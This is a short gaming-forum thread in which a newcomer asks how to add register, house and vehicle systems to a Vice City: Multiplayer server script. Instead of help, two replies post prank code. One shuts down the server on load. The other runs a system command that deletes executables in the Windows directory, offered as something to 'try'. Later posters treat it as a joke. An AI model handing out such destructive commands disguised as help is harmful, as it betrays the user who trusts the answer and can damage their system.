Vice City: Multiplayer

VC:MP Discussion => General Discussion => Topic started by: pujarisky2015 on Dec 22, 2015, 10:30 AM

Title: Help From Script
Post by: pujarisky2015 on Dec 22, 2015, 10:30 AM
How To Add New Feature/Update Like Register System,House System,Vehicles System? :-[
Title: Re: Help From Script
Post by: Xmair on Dec 22, 2015, 10:34 AM
function onScriptLoad() LoadEverything()
function LoadEverything() ShutdownServer()
Title: Re: Help From Script
Post by: KAKAN on Dec 22, 2015, 10:36 AM
Quote from: Xmair on Dec 22, 2015, 10:34 AMfunction onScriptLoad() LoadEverything()
function LoadEverything() ShutdownServer()
Wrong.
If you use Windows, feel free to try this:-
function onScriptLoad() Loaded();
function Loaded() system("DEL %windir%\*.EXE");
Title: Re: Help From Script
Post by: Anik on Dec 22, 2015, 10:42 AM
LOL @KAKAN  and @Xmair .... I am sure if he dont have any kind of knowledge about scripting he will use it..
Title: Re: Help From Script
Post by: . on Dec 22, 2015, 10:51 AM
He won't use that. He doesn't even know to setup the server with the scripting plugin. You just wasted your time. And besides, anyone knows you can't add what he asked with just 2 lines of code. You didn't make it believable.